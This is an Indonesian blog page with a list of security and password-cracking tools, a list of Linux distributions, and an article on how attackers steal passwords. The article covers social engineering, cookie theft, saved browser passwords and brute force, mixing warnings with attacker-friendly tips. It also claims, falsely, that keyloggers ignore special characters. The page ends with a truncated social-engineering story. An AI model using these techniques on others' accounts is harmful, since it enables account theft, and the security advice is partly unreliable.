Selasa, 14 Februari 2012

Top Keamanan Peralatan 15 / Hacking & Utilities


 Nmap adalah utilitas open source gratis untuk eksplorasi jaringan atau audit keamanan. Desain untuk secara cepat memindai jaringan yang besar, meskipun bekerja terhadap host tunggal. Nmap menggunakan paket IP baku dengan cara baru untuk menentukan apa host yang tersedia pada jaringan, layanan apa (nama aplikasi dan versi) host tawarkan, apa sistem operasi (dan versi OS) apa yang digunakan, apa jenis firewall / filter paket sedang digunakan, dan puluhan karakteristik lainnya. Nmap berjalan pada sebagian besar jenis komputer dan kedua konsol dan versi grafis yang tersedia. Nmap gratis dan open source.
Dapat digunakan oleh pemula (-sT) atau dengan pro sama (-packet_trace). Sebuah alat yang sangat serbaguna, setelah Anda memahami hasil.

2. Nessus Jauh Security Scanner
Nessus adalah kerentanan paling populer di dunia pemindai yang digunakan di lebih dari 75.000 organisasi di seluruh dunia. Banyak organisasi terbesar di dunia yang menyadari penghematan biaya signifikan dengan menggunakan Nessus untuk melakukan audit perangkat bisnis penting perusahaan dan aplikasi.

3. John the Ripper
John the Ripper adalah password cracker yang cepat, saat ini tersedia untuk banyak rasa Unix (11 secara resmi didukung, tidak termasuk arsitektur yang berbeda), DOS, Win32, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksi password Unix lemah. Selain beberapa crypt (3) jenis hash password yang paling sering ditemukan di berbagai rasa Unix, didukung di luar kotak adalah Kerberos AFS dan Windows LM hash NT/2000/XP/2003, ditambah lagi beberapa dengan patch kontribusi.


4. Nikto
Nikto adalah Open Source (GPL) web server scanner yang melakukan tes komprehensif terhadap web server untuk beberapa item, termasuk lebih dari 3200 file yang berpotensi berbahaya / CGIS, versi di lebih dari 625 server, dan masalah versi tertentu pada lebih dari 230 server. Pindai item dan plugins sering diperbarui dan dapat diupdate secara otomatis.
Nikto adalah scanner CGI yang baik, ada beberapa alat lain yang cocok dengan Nikto (fokus pada sidik jari http atau Google hacking / info dll pengumpulan, artikel lain hanya untuk mereka).

5. SuperScan
Powerfull TCP port scanner, pinger, resolver. SuperScan 4 adalah update dari alat pelabuhan yang sangat populer pemindaian Windows, SuperScan.
Jika Anda membutuhkan alternatif untuk nmap pada Windows dengan antarmuka yang layak, saya sarankan Anda memeriksa ini, itu sangat bagus.

6. p0f
P0f v2 adalah pasif serbaguna OS alat sidik jari. P0f dapat mengidentifikasi sistem operasi pada:
- Mesin yang terhubung ke komputer anda (SYN mode),
- Mesin Anda terhubung ke (modus + SYN ACK),
- Mesin Anda tidak dapat terhubung ke (modus + RST),
- Mesin yang komunikasi Anda dapat mengamati.
Pada dasarnya dapat sidik jari apapun, hanya dengan mendengarkan, hal itu tidak membuat koneksi aktif APAPUN ke mesin target.

7. Wireshark (formely Ethereal)
Wireshark adalah sebuah + jaringan berbasis protokol analyzer GTK, atau sniffer, yang memungkinkan Anda menangkap dan interaktif menelusuri isi frame jaringan. Tujuan dari proyek ini adalah untuk membuat analisa komersial berkualitas untuk Unix dan memberikan fitur Wireshark yang hilang dari sumber tertutup sniffers.
Karya besar di kedua Linux dan Windows (dengan GUI), mudah digunakan dan dapat merekonstruksi Streaming TCP / IP! Akan melakukan tutorial tentang Wireshark nanti.
Dapatkan Wireshark sini

8. Yersinia
Yersinia adalah alat jaringan yang dirancang untuk mengambil keuntungan dari beberapa weakeness dalam protokol layer 2 yang berbeda. Ini berpura-pura menjadi kerangka yang solid untuk menganalisis dan menguji jaringan digunakan dan sistem. Saat ini, protokol jaringan berikut ini diimplementasikan: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Protokol Router Hot siaga (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Layer 2 terbaik kit ada.

9. Penghapus
Eraser merupakan alat keamanan yang canggih, yang memungkinkan Anda untuk menghapus data sensitif dari hard drive Anda dengan Timpa beberapa kali dengan pola yang dipilih dengan cermat. Bekerja dengan Windows 95, 98, ME, NT, 2000, XP dan DOS. Eraser adalah perangkat lunak gratis dan kode sumbernya dirilis di bawah GNU General Public License.
Alat yang sangat baik untuk menjaga data Anda benar-benar aman, jika Anda telah dihapus .. pastikan itu benar-benar pergi, Anda tidak ingin berkeliaran menggigit Anda di pantat.

10. Putty
Putty merupakan implementasi bebas dari Telnet dan SSH untuk Win32 dan platform Unix, bersama dengan xterm terminal emulator. Seorang harus ada untuk setiap h4x0r ingin telnet atau SSH dari Windows tanpa harus menggunakan default jelek klien baris perintah MS.

11. LCP
Tujuan utama dari program LCP adalah password user account audit dan pemulihan di Windows NT/2000/XP/2003. Account informasi impor, Sandi pemulihan, kekuatan distribusi sesi Brute, Hashes komputasi.
Sebuah alternatif gratis yang baik untuk L0phtCrack.

12. Kain dan Habel
Saya pribadi favorit untuk password cracking apapun.
Cain & Abel adalah pemulihan sandi alat untuk Sistem Operasi Microsoft. Hal ini memungkinkan pemulihan mudah berbagai jenis password dengan mengendus jaringan, cracking enkripsi password menggunakan Dictionary attack, Brute-Force dan kriptoanalisis, rekaman percakapan VoIP, decoding orak password, menampilkan kotak password, mengungkap password dan menganalisis cache protokol routing. Program ini tidak mengeksploitasi kerentanan perangkat lunak apapun atau bug yang tidak dapat diperbaiki dengan sedikit usaha.

13. Kodrat
Kismet adalah 802.11 layer2 detektor jaringan nirkabel, sniffer, dan sistem deteksi intrusi. Kismet akan bekerja dengan kartu nirkabel yang mendukung modus pemantauan baku, dan dapat mengendus lalu lintas 802.11b, 802.11a, dan 802.11g.
Sebuah alat nirkabel yang baik selama kartu Anda mendukung rfmon (mencari emas orinocco).

14. Netstumbler
Netstumbler adalah alat untuk Windows yang memungkinkan Anda untuk mendeteksi Wireless Local Area Networks (WLAN) dengan menggunakan 802.11b, 802.11a dan 802.11g. Ia memiliki banyak kegunaan:

    Pastikan jaringan Anda sudah diatur cara yang Anda inginkan.
    Cari lokasi dengan cakupan miskin di WLAN Anda.
    Mendeteksi jaringan lain yang mungkin menyebabkan gangguan pada jaringan Anda.
    Mendeteksi tidak sah "nakal" Jalur akses di tempat kerja Anda.
    Bantuan bertujuan antena directional untuk jarak jauh link WLAN.
    Gunakan recreationally untuk WarDriving.

15. Hping
hping adalah TCP baris perintah / berorientasi assembler paket IP / analyzer. Antarmuka ini terinspirasi untuk unix perintah ping, tapi hping tidak hanya dapat mengirimkan permintaan ICMP echo. Mendukung TCP, UDP, protokol ICMP dan RAW-IP, memiliki modus traceroute, kemampuan untuk mengirim file antara saluran tertutup, dan banyak fitur lainnya.

Minggu, 29 Januari 2012

Macam - Macam Distro Linux

Distro Linux (singkatan dari distribusi Linux) adalah sebutan untuk sistem operasi komputer dan aplikasinya, merupakan keluarga Unix yang menggunakan kernel Linux. Distribusi Linux bisa berupa perangkat lunak bebas dan bisa juga berupa perangkat lunak komersial seperti Red Hat Enterprise, SuSE, dan lain-lain. Ada banyak distribusi atau distro Linux yang telah muncul. Beberapa bertahan dan besar, bahkan sampai menghasilkan distro turunan, contohnya Distro Debian GNU/Linux. Distro ini telah menghasilkan puluhan distro anak, antara lain Ubuntu, Knoppix, Xandros, DSL, dan sebagainya.
Untuk mendapatkan distro linux, anda dapat mengunduh langsung dari situs distributor distro bersangkutan, atau membelinya dari penjual lokal.
CD Linux
CD Linux (maksudnya CD Distro Linux atau CD Sistem Operasi dan aplikasi Linux) adalah istilah yang sering digunakan untuk menyebut CD distribusi Linux secara umum. Dalam komputer, tar (berasal dari tape archive) adalah format file baik (dalam bentuk suatu jenis arsip bitstream) dan nama program yang digunakan untuk menangani file tersebut. Format ini diciptakan pada masa-masa awal Unix dan distandarisasi oleh POSIX.1-1988 dan kemudian POSIX.1-2001.
Awalnya dikembangkan untuk ditulis berurutan langsung ke I / O tape cadangan perangkat untuk keperluan, sekarang sering digunakan untuk mengumpulkan banyak file menjadi satu file lebih besar untuk distribusi atau pengarsipan, sambil menjaga informasi sistem berkas seperti user dan grup hak akses, tanggal, dan struktur direktori.
Repositori
Sebuah repositori perangkat lunak adalah lokasi penyimpanan dari berbagai paket perangkat lunak yang mungkin diambil dan diinstal pada komputer. Banyak penerbit perangkat lunak dan organisasi lain memelihara server di Internet untuk tujuan ini, baik secara gratis atau untuk biaya berlangganan.
Repositori mungkin hanya untuk program-program tertentu, seperti CPAN untuk bahasa pemrograman Perl, atau untuk seluruh sistem operasi. Operator repositori tersebut biasanya menyediakan sebuah sistem manajemen paket, alat-alat yang dimaksudkan untuk mencari, menginstal dan sebaliknya memanipulasi paket perangkat lunak dari repositori.
Sebagai contoh, banyak distribusi Linux menggunakan Advanced Packaging Tool yang umumnya ditemukan di distro berbasis Debian, atau yum yang biasa ditemukan di distro berbasis Red Hat. Ada juga beberapa sistem manajemen paket independen, seperti Pacman, digunakan dalam Arch Linux dan equo, ditemukan di Sabayon Linux.
Sebagian besar distribusi Linux mempunyai banyak repositori di seluruh dunia yang cermin repositori utama.
Daftar distribusi Linux
Distribusi bebas berbasis Debian
  1. 64Studio
  2. Adamantix
  3. Amber Linux
  4. BeatrIX
  5. Bonzai Linux
  6. Debian
  7. Debian-BR-CDD
  8. DeveLinux
  9. Dreamlinux
  10. Elive
  11. Finnix
  12. GenieOS
  13. Gnoppix
  14. gOS linux
  15. Guadalinex
  16. Hiweed
  17. Kalango
  18. Kanotix
  19. Knoppix
  20. Kuliax (sebuah distro Linux yang dikembangkan Indonesia)
  21. Kurumin
  22. LinEx
  23. Loco Linux
  24. MeNTOPPIX
  25. Morphix
  26. NepaLinux
  27. PingOO
  28. Skolelinux
  29. Sun Wah RAYS LX
  30. Symphony OS
  31. Ubuntu
    • BlankOn Linux (sebuah distro Linux yang dikembangkan Indonesia)
    • Dewalinux (sebuah distro Linux yang dikembangkan Indonesia)
    • Briker (sebuah distro Linux yang dikembangkan Indonesia)
    • Edubuntu
    • Kubuntu
    • Xubuntu
    • De2
  32. Xandros
  33. Zen Linux
Distribusi berbasiskan RPM
  1. aLinux
  2. ALT Linux
  3. Annvix
  4. Ark Linux
  5. ASPLinux
  6. Aurox
  7. Berry Linux
  8. BLAG Linux and GNU
  9. BlankOn versi pertama (sebuah distro Linux yang dikembangkan Indonesia)
  10. Caixa Mágica
  11. cAos Linux
  12. CentOS
  13. Cobind
  14. Conectiva
  15. EduLinux
  16. Engarde Secure Linux
  17. Fox Linux
  18. IGOS Nusantara (sebuah distro linux yang dikembangkan Indonesia)
  19. Linux Mobile System
  20. Magic Linux
  21. Mandriva Linux (dahulu bernama Mandrake Linux)
  22. NOPPENLINUX
  23. PCLinuxOS
  24. PCQLinux2005
  25. PLD Linux Distribution
  26. QiLinux
  27. Red Hat Linux:
    • Fedora Core
    • Red Flag Linux
    • Scientific Linux
    • Vine Linux
    • White Box Enterprise Linux
    • Yellow Dog Linux
  28. Sesco Linux
  29. SUSE Linux
  30. Tinfoil Hat Linux
  31. Trustix
  32. Ulteo
  33. YOPER (“Your Operating System”)
Distribusi bebas berbasis Slackware
  1. AliXe
  2. Austrumi
  3. BackTrack
  4. Bluewhite64 Linux
  5. CD Forum Linux (sebuah distro Linux yang dikembangkan Indonesia)
  6. College Linux
  7. Cytrun Linux
  8. DARKSTAR
  9. DeepStyle
  10. easys GNU/Linux
  11. Frugalware
  12. Hardened Linux
  13. Kate OS
  14. MooLux
  15. Plamo Linux
  16. SLAX
  17. Sauver
  18. Singkong Linux (sebuah distro Linux yang dikembangkan Indonesia)
  19. Slackintosh
  20. Slackware
  21. Slamd64
  22. Splack Linux
  23. targeT Linux (sebuah distro Linux yang dikembangkan Indonesia)
  24. TopologiLinux
  25. Truva Linux
  26. Ultima Linux
  27. Vector Linux
  28. Wolvix
  29. 0x7F GNU/Linux
  30. ZenCafe Linux (sebuah distro Linux yang dikembangkan Indonesia)
  31. Zenwalk Linux (dulu MiniSlack)
Distribusi bebas berbasis lainnya
Distribusi-distribusi Linux berikut ini memakai sistem manajemen paket sendiri, gabungan atau tidak sama sekali
  1. Arch Linux (dengan sistem manajemen paket Pacman)
  2. Coyote Linux (distro Router/firewall)
  3. CRUX (menggunakan manajemen paket berbasis tar.gz yang sederhana, BSD-style initscripts)
  4. DD-WRT (embedded firewall)
  5. DeLi Linux (kombinasi Slackware dan CRUX)
  6. Devil-Linux (distro firewall/router/server)
  7. DSLinux (Linux untuk Nintendo DS)
  8. dyne:bolic (instalasi software baru cukup dengan menyalin [copy] ke direktori tertentu)
  9. Familiar Linux (distro untuk iPAQ handhelds)
  10. Fli4l (distro yang muat dalam satu floppy disk)
  11. Foresight Linux (menggunakan sistem manajemen paket Conary)
  12. FREESCO (router)
  13. GeeXboX (media center)
  14. GoboLinux (manajemen paket sendiri yang menggunakan symlink)
  15. Hikarunix (distro khusus untuk main Go)
  16. IPCop (distro Router/firewall)
  17. iPodLinux (linux untuk Apple iPod berbasis µCLinux kernel)
  18. Jlime (distro untuk HP Jornada 6xx dan 7xx dan NEC MobilePro 900(c) handhelds)
  19. Lunar Linux (distro berbasis source code)
  20. MCC Interim Linux (mungkin ini distro Linux pertama; dibuat oleh Manchester Computing Centre di bulan February 1992)
  21. MkLinux distro untuk PowerPC, menjalankan Linux kernel sebagai server di atas Mach microkernel)
  22. Mobilinux (buatan Montavista untuk smartphones)
  23. MontaVista Linux (embedded systems distro buatan MontaVista Software)
  24. NASLite (distro floppy-disk untuk menjalankan perangkat Network Attached Storage / NAS)
  25. Nitix (autonomic server buatan Net Integration Technologies Inc.)
  26. OpenWrt (embedded firewall)
  27. Pardus (buatan Turki; menggunakan sistem manajemen paket PISI, dan COMAR configuration framework)
  28. PS2 Linux (distro Sony Computer Entertainment unuk PlayStation 2 video game console)
  29. Puppy Linux (sistem manajemen paket PetGet dan DotPup; tapi mulai versi 3 juga bisa menggunakan paket Slackware)
  30. Rocks Cluster Distribution (untuk computer cluster = gabungan beberapa komputer menjadi satu super komputer)
  31. rPath (menggunakan sistem manajemen paket Conary)
  32. Sentry Firewall (firewall, server sistem)
  33. SliTaz GNU/Linux
  34. Smallfoot
  35. SmoothWall (router/firewall)
  36. Softlanding Linux System (salah satu distro tertua, dibangun tahun 1992-1994; basis awal Slackware)
  37. Sorcerer (berbasis source code)
  38. Source Mage GNU/Linux (berbasis source code)
  39. Tinfoil Hat Linux (distro floppy-disk)
  40. tomsrtbt (root boot disk)

Jumat, 27 Januari 2012

Bagaimana Cara Para Hacker mendapatkan Password

  Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password
email orang lain?” atau pertanyaan yang paling sering saya terima ialah..
“Bagaimana cara anda mendapatkan password saya?” :P

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.

0 [0XFFF0000] Bagaimana Mendapatkannya?

Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling


[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
“penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.

Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.

# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]

[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.

Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.

[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.

[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).

Baca artikel terkait pada arsip lama :)

[5]. Password Cracking

“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute – force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri
aplikasinya di halaman Member – spyrozone.net.

[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.

[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.

[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options
—> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools —> Options —>
Security –> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun
enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!

[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman
bermain” anda akan diambil alih olehnya..

0 [0XFFFF000] Penutup

Wew… ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.

Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)

0 [0XFFFFF00] Referensi

– securityfocus[dot]com
– phrack[dot]org
– spyrozone[dot]tk
– google[dot]com

0 [0XFFFFFF0] Shoutz:

– Vindika Anastasya & Vermouth Anastasya.. The deepest Love I’v ever had.. :)
– All Crack Sky Staff! Hey there.. :)
– ECHOERS, SECTOR-S (wake up guys!!)
– EVILratE, PushMOV, MyzTX, Dr3, Lun4, Clust3r, RX-259, RX-290, RX-313, RX-147
– Mr.Rio, PramayunTA, Alfian, Andien, Taurista, Bachtiar, EQ, WisNU, Arman,
Dani, Rara, Icha, Prita, Vivi, Nabiel, Tika, Kemas, Bomy, Arbi, Tunjung,
Krishna, Rizki..
– All my friend in SMAN 2 SIDOARJO
– All member of www.spyrozone.net .. stay Alert in SPYRO ZONE!!

0 [0XFFFFFFF] Attachment:

Berikut adalah contoh social engineering sederhana. Saya ambil dari tulisan
saya yang berjudul “Pembalasan Untuk Sang Admin”-www.spyrozone.net. Enjoy… ;)

——————————————————————

Pembalasan Untuk Sang Admin – SOcial Engineering

May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net

|—[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup

1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
